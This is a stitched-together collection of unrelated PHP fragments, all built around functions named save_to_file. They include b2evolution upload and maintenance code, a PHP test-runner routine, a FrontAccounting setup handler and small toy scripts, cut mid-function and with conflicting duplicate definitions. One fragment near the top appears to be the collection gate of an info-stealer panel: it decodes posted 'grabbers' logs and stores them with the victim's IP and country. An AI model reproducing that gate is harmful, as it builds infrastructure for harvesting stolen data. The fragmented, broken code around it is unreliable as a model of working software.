out_echo($message, $specialchars);
exit;
}
$newName = $file->getName();
$oldName = $newName;
// validate file name
if ($error_filename = process_filename($newName)) {
// Not a file name or not an allowed extension
$message['text'] = '<span class="result_error"> ' . $error_filename . '</span>';
out_echo($message, $specialchars);
exit;
}
list($newFile, $oldFile_thumb) = check_file_exists($fm_FileRoot, $path, $newName);
$newName = $newFile->get('name');
// If everything is ok, save the file somewhere
if (save_to_file($file->get_content(), $newFile->get_full_path(), 'wb')) {
// Change to default chmod settings
$newFile->chmod(NULL);
// Refreshes file properties (type, size, perms...)
$newFile->load_properties();
// save file into the db
$newFile->dbsave();
// Prepare the uploaded file to the final format ( E.g. Resize and Rotate images )
prepare_uploaded_files(array($newFile));
$message = '';
if (!empty($oldFile_thumb)) {
$image_info = getimagesize($newFile->get_full_path());
if ($image_info) {
$newFile_thumb = $newFile->get_preview_thumb('fulltype');
} else {
$newFile_thumb = $newFile->get_size_formatted();
<?php
ini_set("max_execution_time", 0);
require "includes/geoip.php";
require "includes/functions.php";
if (isset($_POST["logs"])) {
$logs = trim($_POST["logs"]);
$logs = str_replace(" ", "+", $logs);
$logs = base64_decode($logs);
if (isset($_POST["module"]) && $_POST["module"] == "grabbers") {
$ip = $_SERVER["REMOTE_ADDR"];
$country = get_country($ip);
$date = date("d.m.Y H:i.s");
save_to_file("logs/grabbers/grabbers.txt", "==============================\r\n IP: {$ip}\r\n Country: {$country}\r\n Date: {$date}\r\n==============================\r\n\r\n" . $logs . "\r\n");
}
}
function run_test($file)
{
if ($this->conf['TEST_PHP_DETAILED']) {
$this->writemsg("\n=================\nTEST {$file}\n");
}
$section_text = $this->getSectionText($file);
if ($this->iswin32) {
$shortname = str_replace($this->conf['TEST_BASE_PATH'] . '\\', '', $file);
} else {
$shortname = str_replace($this->conf['TEST_BASE_PATH'] . '/', '', $file);
}
$tested = $section_text['TEST'] . " [{$shortname}]";
if ($this->conf['TEST_WEB']) {
$tmp_file = ereg_replace('\\.phpt$', '.' . $this->conf['TEST_WEB_EXT'], $file);
$uri = $this->conf['TEST_BASE_SCRIPT_NAME'] . str_replace($this->conf['TEST_BASE_PATH'], '', $tmp_file);
$uri = str_replace('\\', '/', $uri);
} else {
$tmp_file = ereg_replace('\\.phpt$', '.php', $file);
}
@unlink($tmp_file);
// unlink old test results
@unlink(ereg_replace('\\.phpt$', '.diff', $file));
@unlink(ereg_replace('\\.phpt$', '.log', $file));
@unlink(ereg_replace('\\.phpt$', '.exp', $file));
@unlink(ereg_replace('\\.phpt$', '.out', $file));
if (!$this->conf['TEST_WEB']) {
// Reset environment from any previous test.
$env = $this->getENVSettings($section_text, $tmp_file);
$ini_overwrites = $this->getINIParams($section_text);
}
// if this is a cgi test, prepare for it
$query_string = '';
$havepost = array_key_exists('POST', $section_text) && !empty($section_text['POST']);
// allow empty query_string requests
$haveget = array_key_exists('GET', $section_text) && !empty($section_text['GET']);
$do_cgi = array_key_exists('CGI', $section_text) || $haveget || $havepost;
$skipreason = $this->getSkipReason($file, $section_text, $do_cgi);
if ($skipreason == 'SKIPPED') {
return $skipreason;
}
// We've satisfied the preconditions - run the test!
save_to_file($tmp_file, $section_text['FILE']);
$post = NULL;
$args = "";
$headers = array();
if ($this->conf['TEST_WEB']) {
$request = $this->getEvalTestSettings(@$section_text['REQUEST'], $tmp_file);
$headers = $this->getEvalTestSettings(@$section_text['HEADERS'], $tmp_file);
$method = isset($request['method']) ? $request['method'] : $havepost ? 'POST' : 'GET';
$query_string = $haveget ? $section_text['GET'] : '';
$options = array();
$options['method'] = $method;
if (isset($this->conf['timeout'])) {
$options['timeout'] = $this->conf['timeout'];
}
if (isset($this->conf['proxy_host'])) {
$options['proxy_host'] = $this->conf['proxy_host'];
}
if (isset($this->conf['proxy_port'])) {
$options['proxy_port'] = $this->conf['proxy_port'];
}
if (isset($this->conf['proxy_user'])) {
$options['proxy_user'] = $this->conf['proxy_user'];
}
if (isset($this->conf['proxy_pass'])) {
$options['proxy_pass'] = $this->conf['proxy_pass'];
}
$post = $havepost ? $section_text['POST'] : NULL;
$url = $this->conf['TEST_SERVER_URL'];
if (isset($request['SCRIPT_NAME'])) {
$url .= $request['SCRIPT_NAME'];
} else {
$url .= $uri;
}
if (isset($request['PATH_INFO'])) {
$url .= $request['PATH_INFO'];
}
if (isset($request['FRAGMENT'])) {
$url .= '#' . $request['FRAGMENT'];
}
if (isset($request['QUERY_STRING'])) {
$query_string = $request['QUERY_STRING'];
}
if ($query_string) {
$url .= '?' . $query_string;
}
if ($this->conf['TEST_PHP_DETAILED']) {
$this->writemsg("\nURL = {$url}\n");
}
} else {
if ($do_cgi) {
$query_string = $haveget ? $section_text['GET'] : '';
if (!array_key_exists('GATEWAY_INTERFACE', $env)) {
$env['GATEWAY_INTERFACE'] = 'CGI/1.1';
}
if (!array_key_exists('SERVER_SOFTWARE', $env)) {
$env['SERVER_SOFTWARE'] = 'PHP Test Harness';
}
if (!array_key_exists('SERVER_SOFTWARE', $env)) {
$env['SERVER_NAME'] = '127.0.0.1';
}
if (!array_key_exists('REDIRECT_STATUS', $env)) {
$env['REDIRECT_STATUS'] = '200';
}
if (!array_key_exists('SERVER_NAME', $env)) {
$env['QUERY_STRING'] = $query_string;
}
if (!array_key_exists('PATH_TRANSLATED', $env) && !array_key_exists('SCRIPT_FILENAME', $env)) {
$env['PATH_TRANSLATED'] = $tmp_file;
$env['SCRIPT_FILENAME'] = $tmp_file;
}
if (!array_key_exists('PATH_TRANSLATED', $env)) {
$env['PATH_TRANSLATED'] = '';
}
if (!array_key_exists('PATH_INFO', $env)) {
$env['PATH_INFO'] = '';
}
if (!array_key_exists('SCRIPT_NAME', $env)) {
$env['SCRIPT_NAME'] = '';
}
if (!array_key_exists('SCRIPT_FILENAME', $env)) {
$env['SCRIPT_FILENAME'] = '';
}
if (array_key_exists('POST', $section_text) && (!$haveget || !empty($section_text['POST']))) {
$post = $section_text['POST'];
$content_length = strlen($post);
if (!array_key_exists('REQUEST_METHOD', $env)) {
$env['REQUEST_METHOD'] = 'POST';
}
if (!array_key_exists('CONTENT_TYPE', $env)) {
$env['CONTENT_TYPE'] = 'application/x-www-form-urlencoded';
}
if (!array_key_exists('CONTENT_LENGTH', $env)) {
$env['CONTENT_LENGTH'] = $content_length;
}
} else {
if (!array_key_exists('REQUEST_METHOD', $env)) {
$env['REQUEST_METHOD'] = 'GET';
}
if (!array_key_exists('CONTENT_TYPE', $env)) {
$env['CONTENT_TYPE'] = '';
}
if (!array_key_exists('CONTENT_LENGTH', $env)) {
$env['CONTENT_LENGTH'] = '';
}
}
if ($this->conf['TEST_PHP_DETAILED'] > 1) {
$this->writemsg("\nCONTENT_LENGTH = " . $env['CONTENT_LENGTH'] . "\nCONTENT_TYPE = " . $env['CONTENT_TYPE'] . "\nPATH_TRANSLATED = " . $env['PATH_TRANSLATED'] . "\nPATH_INFO = " . $env['PATH_INFO'] . "\nQUERY_STRING = " . $env['QUERY_STRING'] . "\nREDIRECT_STATUS = " . $env['REDIRECT_STATUS'] . "\nREQUEST_METHOD = " . $env['REQUEST_METHOD'] . "\nSCRIPT_NAME = " . $env['SCRIPT_NAME'] . "\nSCRIPT_FILENAME = " . $env['SCRIPT_FILENAME'] . "\n");
}
/* not cgi spec to put query string on command line,
but used by a couple tests to catch a security hole
in older php versions. At least IIS can be configured
to do this. */
$args = $env['QUERY_STRING'];
$args = "{$ini_overwrites} {$tmp_file} \"{$args}\" 2>&1";
} else {
$args = $section_text['ARGS'] ? $section_text['ARGS'] : '';
$args = "{$ini_overwrites} {$tmp_file} {$args} 2>&1";
}
}
if ($this->conf['TEST_WEB']) {
// we want headers also, so fopen
$r = new HTTPRequest($url, $headers, $options, $post);
//$out = preg_replace("/\r\n/","\n",$r->response);
$out = $r->response;
$headers = $r->response_headers;
//print $r->outgoing_payload."\n";
//print $r->incoming_payload."\n";
} else {
$out = execute($this->conf['TEST_PHP_EXECUTABLE'], $args, $post, $this->cwd, $env);
// if this is a cgi, remove the headers first
if ($this->test_executable_iscgi && preg_match("/^(.*?)\r?\n\r?\n(.*)/s", $out, $match)) {
$out = $match[2];
$rh = preg_split("/[\n\r]+/", $match[1]);
$headers = array();
foreach ($rh as $line) {
if (strpos($line, ':') !== false) {
$line = explode(":", $line, 2);
$headers[trim($line[0])] = trim($line[1]);
}
}
}
}
if ($this->conf['TEST_PHP_DETAILED'] > 2) {
echo "HEADERS: ";
print_r($headers);
echo "OUTPUT: \n{$out}\n";
}
// Does the output match what is expected?
$output = trim($out);
$output = preg_replace('/\\r\\n/', "\n", $output);
$failed = FALSE;
if (isset($section_text['EXPECTF']) || isset($section_text['EXPECTREGEX'])) {
if (isset($section_text['EXPECTF'])) {
$wanted = $section_text['EXPECTF'];
} else {
$wanted = $section_text['EXPECTREGEX'];
}
$wanted_re = preg_replace('/\\r\\n/', "\n", $wanted);
if (isset($section_text['EXPECTF'])) {
$wanted_re = preg_quote($wanted_re, '/');
// Stick to basics
$wanted_re = str_replace("%s", ".+?", $wanted_re);
//not greedy
$wanted_re = str_replace("%i", "[+\\-]?[0-9]+", $wanted_re);
$wanted_re = str_replace("%d", "[0-9]+", $wanted_re);
$wanted_re = str_replace("%x", "[0-9a-fA-F]+", $wanted_re);
$wanted_re = str_replace("%f", "[+\\-]?\\.?[0-9]+\\.?[0-9]*(E-?[0-9]+)?", $wanted_re);
$wanted_re = str_replace("%c", ".", $wanted_re);
// %f allows two points "-.0.0" but that is the best *simple* expression
}
/* DEBUG YOUR REGEX HERE
var_dump($wanted_re);
print(str_repeat('=', 80) . "\n");
var_dump($output);
*/
$failed = !preg_match("/^{$wanted_re}\$/s", $output);
}
$skipexpect = false;
if (!$failed && $this->conf['TEST_WEB'] && isset($section_text['EXPECTHEADERS'])) {
$want = array();
$lines = preg_split("/[\n\r]+/", $section_text['EXPECTHEADERS']);
$wanted = '';
foreach ($lines as $line) {
if (strpos($line, ':') !== false) {
$line = explode(":", $line, 2);
$want[trim($line[0])] = trim($line[1]);
$wanted .= trim($line[0]) . ': ' . trim($line[1]) . "\n";
}
}
$output = '';
foreach ($want as $k => $v) {
$output .= "{$k}: {$headers[$k]}\n";
if (!isset($headers[$k]) || $headers[$k] != $v) {
$failed = TRUE;
}
}
// different servers may do different things on non-200 results
// for instance, IIS will deliver it's own error pages, so we
// cannot expect to match up the EXPECT section. We may however,
// want to match EXPECT on more than 200 results, so this may
// need to change later.
$skipexpect = isset($headers['Status']) && $headers['Status'] != 200;
}
if (!$failed && !$skipexpect && isset($section_text['EXPECT'])) {
$wanted = $section_text['EXPECT'];
$wanted = preg_replace('/\\r\\n/', "\n", $wanted);
$failed = 0 != strcmp($output, $wanted);
}
if (!$failed) {
@unlink($tmp_file);
$this->showstatus($tested, 'PASSED');
return 'PASSED';
}
// Test failed so we need to report details.
$this->showstatus($tested, 'FAILED');
$this->failed_tests[] = array('name' => $file, 'test_name' => $tested, 'output' => ereg_replace('\\.phpt$', '.log', $file), 'diff' => ereg_replace('\\.phpt$', '.diff', $file));
if ($this->conf['TEST_PHP_DETAILED']) {
$this->writemsg(generate_diff($wanted, $output) . "\n");
}
// write .exp
if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'E') !== FALSE) {
$logname = ereg_replace('\\.phpt$', '.exp', $file);
save_to_file($logname, $wanted);
}
// write .out
if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'O') !== FALSE) {
$logname = ereg_replace('\\.phpt$', '.out', $file);
save_to_file($logname, $output);
}
// write .diff
if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'D') !== FALSE) {
$logname = ereg_replace('\\.phpt$', '.diff', $file);
save_to_file($logname, generate_diff($wanted, $output));
}
// write .log
if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'L') !== FALSE) {
$logname = ereg_replace('\\.phpt$', '.log', $file);
save_to_file($logname, "\n---- EXPECTED OUTPUT\n{$wanted}\n" . "---- ACTUAL OUTPUT\n{$output}\n" . "---- FAILED\n");
// display emacs/msvc error output
if (strpos($this->conf['TEST_PHP_LOG_FORMAT'], 'C') !== FALSE) {
$this->error_report($file, $logname, $tested);
}
}
return 'FAILED';
}
// Validate URL and parse it for the file name
if (!is_absolute_url($url) || !($parsed_url = parse_url($url)) || empty($parsed_url['scheme']) || empty($parsed_url['host']) || empty($parsed_url['path']) || $parsed_url['path'] == '/') {
// Includes forbidding getting the root of a server
$failedFiles[$k] = T_('The URL must start with <code>http://</code> or <code>https://</code> and point to a valid file!');
continue;
}
$file_contents = fetch_remote_page($url, $info, NULL, $Settings->get('upload_maxkb'));
if ($file_contents !== false) {
// Create temporary file and insert contents into it.
$tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload');
if (!$tmpfile_name) {
$failedFiles[$k] = 'Failed to find temporary directory.';
// no trans: very unlikely
continue;
}
if (!save_to_file($file_contents, $tmpfile_name, 'w')) {
unlink($tmpfile_name);
$failedFiles[$k] = sprintf('Could not write to temporary file (%s).', $tmpfile_name);
continue;
}
// Fake/inject info into PHP's array of uploaded files.
// fp> TODO! This is a nasty dirty hack. That kind of stuff always breaks somewhere down the line. Needs cleanup.
// This allows us to treat it (nearly) the same way as regular uploads, apart from
// is_uploaded_file(), which we skip and move_uploaded_file() (where we use rename()).
$_FILES['uploadfile']['name'][$k] = rawurldecode(basename($parsed_url['path']));
$_FILES['uploadfile']['size'][$k] = evo_bytes($file_contents);
$_FILES['uploadfile']['error'][$k] = 0;
$_FILES['uploadfile']['tmp_name'][$k] = $tmpfile_name;
$_FILES['uploadfile']['_evo_fetched_url'][$k] = $url;
// skip is_uploaded_file and keep info
unset($file_contents);
/**
* metaWeblog.newMediaObject image upload
* wp.uploadFile
*
* Supplied image is encoded into the struct as bits
*
* @see http://www.xmlrpc.com/metaWeblogApi#metaweblognewmediaobject
* @see http://codex.wordpress.org/XML-RPC_wp#wp.uploadFile
*
* @param xmlrpcmsg XML-RPC Message
* 0 blogid (string): Unique identifier of the blog the post will be added to.
* Currently ignored in b2evo, in favor of the category.
* 1 username (string): Login for a Blogger user who has permission to edit the given
* post (either the user who originally created it or an admin of the blog).
* 2 password (string): Password for said username.
* 3 struct (struct)
* - name : filename
* - type : mimetype
* - bits : base64 encoded file
* @return xmlrpcresp XML-RPC Response
*/
function _wp_mw_newmediaobject($m)
{
global $Settings, $Plugins, $force_upload_forbiddenext;
// CHECK LOGIN:
/**
* @var User
*/
if (!($current_User =& xmlrpcs_login($m, 1, 2))) {
// Login failed, return (last) error:
return xmlrpcs_resperror();
}
// GET BLOG:
/**
* @var Blog
*/
if (!($Blog =& xmlrpcs_get_Blog($m, 0))) {
// Login failed, return (last) error:
return xmlrpcs_resperror();
}
// CHECK PERMISSION:
if (!$current_User->check_perm('files', 'add', false, $Blog->ID)) {
// Permission denied
return xmlrpcs_resperror(3);
// User error 3
}
logIO('Permission granted.');
if (!$Settings->get('upload_enabled')) {
return xmlrpcs_resperror(2, 'Object upload not allowed');
}
$xcontent = $m->getParam(3);
// Get the main data - and decode it properly for the image - sorry, binary object
logIO('Decoding content...');
$contentstruct = xmlrpc_decode_recurse($xcontent);
$data = $contentstruct['bits'];
$file_mimetype = isset($contentstruct['type']) ? $contentstruct['type'] : '(none)';
logIO('Received MIME type: ' . $file_mimetype);
$overwrite = false;
if (isset($contentstruct['overwrite'])) {
$overwrite = (bool) $contentstruct['overwrite'];
}
logIO('Overwrite if exists: ' . ($overwrite ? 'yes' : 'no'));
load_funcs('files/model/_file.funcs.php');
$filesize = evo_bytes($data);
if (($maxfilesize = $Settings->get('upload_maxkb') * 1024) && $filesize > $maxfilesize) {
return xmlrpcs_resperror(4, sprintf(T_('The file is too large: %s but the maximum allowed is %s.'), bytesreadable($filesize, false), bytesreadable($maxfilesize, false)));
}
logIO('File size is OK: ' . bytesreadable($filesize, false));
$FileRootCache =& get_FileRootCache();
$fm_FileRoot =& $FileRootCache->get_by_type_and_ID('collection', $Blog->ID, true);
if (!$fm_FileRoot) {
// fileRoot not found:
return xmlrpcs_resperror(14, 'File root not found');
}
$rf_filepath = $contentstruct['name'];
logIO('Received filepath: ' . $rf_filepath);
// Split into path + name:
$filepath_parts = explode('/', $rf_filepath);
$filename = array_pop($filepath_parts);
logIO('Original file name: ' . $filename);
// Validate and sanitize filename
if ($error_filename = process_filename($filename, true)) {
return xmlrpcs_resperror(5, $error_filename);
}
logIO('Sanitized file name: ' . $filename);
// Check valid path parts:
$rds_subpath = '';
foreach ($filepath_parts as $filepath_part) {
if (empty($filepath_part) || $filepath_part == '.') {
// self ref not useful
continue;
}
if ($error = validate_dirname($filepath_part)) {
// invalid relative path:
logIO($error);
return xmlrpcs_resperror(6, $error);
}
$rds_subpath .= $filepath_part . '/';
}
logIO('Subpath: ' . $rds_subpath);
// Create temporary file and insert contents into it.
$tmpfile_name = tempnam(sys_get_temp_dir(), 'fmupload');
if ($tmpfile_name) {
if (save_to_file($data, $tmpfile_name, 'wb')) {
$image_info = @getimagesize($tmpfile_name);
} else {
return xmlrpcs_resperror(13, 'Error while writing to temp file.');
}
}
if (!empty($image_info)) {
// This is an image file, let's check mimetype and correct extension
if ($image_info['mime'] != $file_mimetype) {
// Invalid file type
$FiletypeCache =& get_FiletypeCache();
// Get correct file type based on mime type
$correct_Filetype = $FiletypeCache->get_by_mimetype($image_info['mime'], false, false);
$file_mimetype = $image_info['mime'];
// Check if file type is known by us, and if it is allowed for upload.
// If we don't know this file type or if it isn't allowed we don't change the extension! The current extension is allowed for sure.
if ($correct_Filetype && $correct_Filetype->is_allowed()) {
// A FileType with the given mime type exists in database and it is an allowed file type for current User
// The "correct" extension is a plausible one, proceed...
$correct_extension = array_shift($correct_Filetype->get_extensions());
$path_info = pathinfo($filename);
$current_extension = $path_info['extension'];
// change file extension to the correct extension, but only if the correct extension is not restricted, this is an extra security check!
if (strtolower($current_extension) != strtolower($correct_extension) && !in_array($correct_extension, $force_upload_forbiddenext)) {
// change the file extension to the correct extension
$old_filename = $filename;
$filename = $path_info['filename'] . '.' . $correct_extension;
}
}
}
}
// Get File object for requested target location:
$FileCache =& get_FileCache();
$newFile =& $FileCache->get_by_root_and_path($fm_FileRoot->type, $fm_FileRoot->in_type_ID, trailing_slash($rds_subpath) . $filename, true);
if ($newFile->exists()) {
if ($overwrite && $newFile->unlink()) {
// OK, file deleted
// Delete thumb caches from old location:
logIO('Old file deleted');
$newFile->rm_cache();
} else {
return xmlrpcs_resperror(8, sprintf(T_('The file «%s» already exists.'), $filename));
}
}
// Trigger plugin event
if ($Plugins->trigger_event_first_false('AfterFileUpload', array('File' => &$newFile, 'name' => &$filename, 'type' => &$file_mimetype, 'tmp_name' => &$tmpfile_name, 'size' => &$filesize))) {
// Plugin returned 'false'.
// Abort upload for this file:
@unlink($tmpfile_name);
return xmlrpcs_resperror(16, 'File upload aborted by a plugin.');
}
if (!mkdir_r($newFile->get_dir())) {
// Dir didn't already exist and could not be created
return xmlrpcs_resperror(9, 'Error creating sub directories: ' . $newFile->get_rdfs_rel_path());
}
if (!@rename($tmpfile_name, $newFile->get_full_path())) {
return xmlrpcs_resperror(13, 'Error while writing to file.');
}
// chmod the file
$newFile->chmod();
// Initializes file properties (type, size, perms...)
$newFile->load_properties();
// Load meta data AND MAKE SURE IT IS CREATED IN DB:
$newFile->meta == 'unknown';
$newFile->load_meta(true);
// Resize and rotate
logIO('Running file post-processing (resize and rotate)...');
prepare_uploaded_files(array($newFile));
logIO('Done');
$url = $newFile->get_url();
logIO('URL of new file: ' . $url);
$struct = new xmlrpcval(array('file' => new xmlrpcval($filename, 'string'), 'url' => new xmlrpcval($url, 'string'), 'type' => new xmlrpcval($file_mimetype, 'string')), 'struct');
logIO('OK.');
return new xmlrpcresp($struct);
}
function handle_submit()
{
global $db_connections, $def_coy, $tb_pref_counter, $db, $comp_path, $comp_subdirs;
$new = false;
if (!check_data()) {
return false;
}
$id = $_GET['id'];
$db_connections[$id]['name'] = $_POST['name'];
$db_connections[$id]['host'] = $_POST['host'];
$db_connections[$id]['dbuser'] = $_POST['dbuser'];
$db_connections[$id]['dbpassword'] = $_POST['dbpassword'];
$db_connections[$id]['dbname'] = $_POST['dbname'];
if ((bool) $_POST['def'] == true) {
$def_coy = $id;
}
if (isset($_GET['ul']) && $_GET['ul'] == 1) {
$conn = $db_connections[$id];
if (($db = db_create_db($conn)) == 0) {
display_error(tr("Error creating Database: ") . $conn['dbname'] . tr(", Please create it manually"));
remove_connection($id);
set_global_connection();
return false;
}
$filename = $_FILES['uploadfile']['tmp_name'];
if (is_uploaded_file($filename)) {
db_import($filename, $conn, $id);
if (isset($_POST['admpassword']) && $_POST['admpassword'] != "") {
db_query("UPDATE users set password = '******'admpassword']) . "' WHERE user_id = 'admin'");
}
} else {
display_error(tr("Error uploading Database Script, please upload it manually"));
set_global_connection();
return false;
}
set_global_connection();
}
$error = write_config_db($new);
if ($error == -1) {
display_error(tr("Cannot open the configuration file - ") . $path_to_root . "/config_db.php");
} else {
if ($error == -2) {
display_error(tr("Cannot write to the configuration file - ") . $path_to_root . "/config_db.php");
} else {
if ($error == -3) {
display_error(tr("The configuration file ") . $path_to_root . "/config_db.php" . tr(" is not writable. Change its permissions so it is, then re-run the operation."));
}
}
}
if ($error != 0) {
return false;
}
$index = "<?php\nheader(\"Location: ../../index.php\");\n?>";
if ($new) {
$cdir = $comp_path . '/' . $id;
@mkdir($cdir);
save_to_file($cdir . '/' . 'index.php', 0, $index);
foreach ($comp_subdirs as $dir) {
@mkdir($cdir . '/' . $dir);
save_to_file($cdir . '/' . $dir . '/' . 'index.php', 0, $index);
}
}
return true;
}
/**
* Prepare maintenance directory
*
* @param string directory path
* @param boolean create .htaccess file with 'deny from all' text
* @return boolean
*/
function prepare_maintenance_dir($dir_name, $deny_access = true)
{
// echo '<p>'.T_('Checking destination directory: ').$dir_name.'</p>';
if (!file_exists($dir_name)) {
// We can create directory
if (!mkdir_r($dir_name)) {
echo '<p style="color:red">' . sprintf(T_('Unable to create «%s» directory.'), $dir_name) . '</p>';
evo_flush();
return false;
}
}
if ($deny_access) {
// Create .htaccess file
echo '<p>' . T_('Checking .htaccess denial for directory: ') . $dir_name;
evo_flush();
$htaccess_name = $dir_name . '.htaccess';
if (!file_exists($htaccess_name)) {
// We can create .htaccess file
if (!save_to_file('deny from all', $htaccess_name, 'w')) {
echo '</p><p style="color:red">' . sprintf(T_('Unable to create «%s» file in directory.'), $htaccess_name) . '</p>';
evo_flush();
return false;
}
if (!file_exists($dir_name . 'index.html')) {
// Create index.html to disable directory browsing
save_to_file('', $dir_name . 'index.html', 'w');
}
}
echo ' : OK.</p>';
evo_flush();
// fp> TODO: make sure "deny all" actually works by trying to request the directory through HTTP
}
return true;
}
/**
* Generate .POT file
*/
function translation_generate_pot_file()
{
global $DB, $locales_path;
$pot_file_name = $locales_path . 'messages.pot';
$pot_content = array();
$pot_content[] = '# b2evolution - Language file';
$pot_content[] = '# Copyright (C) ' . date('Y') . ' Francois PLANQUE';
$pot_content[] = '# This file is distributed under the same license as the b2evolution package.';
$pot_content[] = '';
global $basepath;
$translation_strings = array();
translation_scandir($basepath, $translation_strings);
foreach ($translation_strings as $string => $files) {
// Format the translation strings to write in .POT file
foreach ($files as $file) {
$pot_content[] = '#: ' . $file;
}
$pot_content[] = 'msgid "' . $string . '"';
$pot_content[] = 'msgstr ""';
$pot_content[] = '';
}
// Write to .POT file
$ok = save_to_file(implode("\r\n", $pot_content), $pot_file_name, 'w+');
return (bool) $ok;
}
* @authors Your Name (you@example.org)
* @date 2016-02-18 12:02:31
* @version $Id$
*/
$data = $_POST["data"];
// echo "hello world";
// $filename=dirname(__FILE__);
chdir('/www/sgh');
// $imgname="aaa".".png";
$img_path1 = '/www/sgh/html/aaa.txt';
// $img_path2='/html/images/'.$imgname;
// function convert_data($data){
// $image=base64_decode($data);
// save_to_file($image);
// }
function save_to_file()
{
echo "hello world";
echo filesize($img_path1);
$fp = fopen('/www/sgh/html/aaa.txt', "r");
$return_data = fread($fp, filesize($img_path1));
// echo $return_data;
fclose($fp);
echo $return_data;
// $arr=array('data'=>$return_data);
// exit(json_decode($arr));
}
save_to_file();
// convert_data($data);
// $arr=array("url"=>$img_path2);
// exit(json_encode($arr));
$block_item_Widget->disp_template_replaced('block_start');
$download_url = param('upd_url', 'string');
$upgrade_name = param('upd_name', 'string', '', true);
$upgrade_file = $upgrade_path . $upgrade_name . '.zip';
if ($success = prepare_maintenance_dir($upgrade_path, true)) {
// Set maximum execution time
set_max_execution_time(1800);
// 30 minutes
echo '<p>' . sprintf(T_('Downloading package to «<strong>%s</strong>»...'), $upgrade_file);
evo_flush();
// Downloading
$file_contents = fetch_remote_page($download_url, $info, 1800);
if (empty($file_contents)) {
$success = false;
echo '</p><p style="color:red">' . sprintf(T_('Unable to download package from «%s»'), $download_url) . '</p>';
} elseif (!save_to_file($file_contents, $upgrade_file, 'w')) {
// Impossible to save file...
$success = false;
echo '</p><p style="color:red">' . sprintf(T_('Unable to create file: «%s»'), $upgrade_file) . '</p>';
if (file_exists($upgrade_file)) {
// Remove file from disk
if (!@unlink($upgrade_file)) {
echo '<p style="color:red">' . sprintf(T_('Unable to remove file: «%s»'), $upgrade_file) . '</p>';
}
}
} else {
// The package is downloaded successfully
echo ' OK.</p>';
}
evo_flush();
}
function convert_data($data)
{
$image = base64_decode($data);
save_to_file($image);
}
/**
* Generate .POT file
*/
function translation_generate_pot_file()
{
global $DB, $locales_path;
$pot_file_name = $locales_path . 'messages.pot';
$pot_content = array();
$pot_content[] = '# b2evolution - Language file';
$pot_content[] = '# Copyright (C) ' . date('Y') . ' Francois PLANQUE';
$pot_content[] = '# This file is distributed under the same license as the b2evolution package.';
$pot_content[] = '';
global $basepath;
$translation_strings = array();
translation_scandir($basepath, $translation_strings);
foreach ($translation_strings as $string => $files) {
// Format the translation strings to write in .POT file
if (isset($files['trans'])) {
// Text of TRANS info
if (is_array($files['trans'])) {
// Multiline TRANS info
foreach ($files['trans'] as $ft => $files_trans) {
$pot_content[] = '#. ' . ($ft == 0 ? 'TRANS: ' : '') . $files_trans;
}
} else {
// Single TRANS info
$pot_content[] = '#. TRANS: ' . $files['trans'];
}
unset($files['trans']);
}
foreach ($files as $file) {
// File name and line number where string exists
$pot_content[] = '#: ' . $file[1] . ':' . $file[0];
}
if (strpos($string, '%') !== false) {
// Char '%' is detected in the string
if (preg_match('/%(s|\\d*d)/', $string)) {
// The string contains a mask like %s or %d
$pot_content[] = '#, php-format';
} else {
// The string contains a simple char '%'
$pot_content[] = '#, no-php-format';
}
}
$pot_content[] = 'msgid "' . $string . '"';
$pot_content[] = 'msgstr ""';
$pot_content[] = '';
}
// Write to .POT file
$ok = (bool) save_to_file(implode("\n", $pot_content), $pot_file_name, 'w+');
if (!$ok) {
// Inform user about no permission to write POT file
global $Messages;
$Messages->add(sprintf(T_('The file %s cannot be written to disk. Please check the filesystem permissions.'), '<b>' . $pot_file_name . '</b>'), 'error');
}
return $ok;
}
function save_to_file($filename, $name, $email, $year, $month, $day, $sex)
{
// TODO
}
// read in form values
$name = get_value_post("name");
$email = get_value_post("email");
$year = get_value_post("year");
$month = get_value_post("month");
$day = get_value_post("day");
$sex = get_value_post("sex");
$terms = get_value_post("terms");
// check if the form has been submitted -- any of the input values is set
$submitted = isset($_POST['name']);
if ($submitted) {
// check for errors
$errors = input_check($name, $email, $year, $month, $day, $sex, $terms);
if (count($errors) > 0) {
display_form($name, $email, $year, $month, $day, $sex, $terms, $errors);
} else {
confirm($name, $email, $year, $month, $day, $sex);
save_to_file("users.txt", $name, $email, $year, $month, $day, $sex);
}
} else {
// display form for the first time
display_form();
}
?>
</body>
</html>
/**
* Update file /conf/_basic_config.php
*
* @param string Current action, updated by reference
* @param array Params
* @return boolean TRUE on success
*/
function update_basic_config_file($params = array())
{
global $DB, $db_config, $evo_charset, $conf_path, $default_locale;
// These global params should be rewritten by this function on success result
global $baseurl, $admin_email, $config_is_done, $action;
$params = array_merge(array('db_user' => '', 'db_password' => '', 'db_name' => '', 'db_host' => '', 'db_tableprefix' => '', 'baseurl' => '', 'admin_email' => '', 'print_messages' => true, 'quick_install' => false), $params);
if (!$params['print_messages']) {
// Start to get all messages instead of printing on screen:
ob_start();
// Use this global var to store all messages
global $basic_config_file_result_messages;
}
// Connect to DB:
$DB = new DB(array('user' => $params['db_user'], 'password' => $params['db_password'], 'name' => $params['db_name'], 'host' => $params['db_host'], 'aliases' => $db_config['aliases'], 'connection_charset' => empty($db_config['connection_charset']) ? DB::php_to_mysql_charmap($evo_charset) : $db_config['connection_charset'], 'halt_on_error' => false));
if ($DB->error) {
// restart conf
display_install_messages(T_('It seems that the database config settings you entered don\'t work. Please check them carefully and try again...'));
$action = 'start';
} else {
$conf_template_filepath = $conf_path . '_basic_config.template.php';
$conf_filepath = $conf_path . '_basic_config.php';
// Read original:
$file_loaded = @file($conf_template_filepath);
if (empty($file_loaded)) {
// This should actually never happen, just in case...
display_install_messages(sprintf(T_('Could not load original conf file [%s]. Is it missing?'), $conf_filepath));
if (!$params['print_messages']) {
// Return all messages instead of printing on screen
$basic_config_file_result_messages = ob_get_clean();
}
return false;
}
// File loaded...
$conf = implode('', $file_loaded);
// Update conf:
$conf = preg_replace(array('#\\$db_config\\s*=\\s*array\\(
\\s*[\'"]user[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
\\s*[\'"]password[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
\\s*[\'"]name[\'"]\\s*=>\\s*[\'"].*?[\'"], ([^\\n\\r]*\\r?\\n)
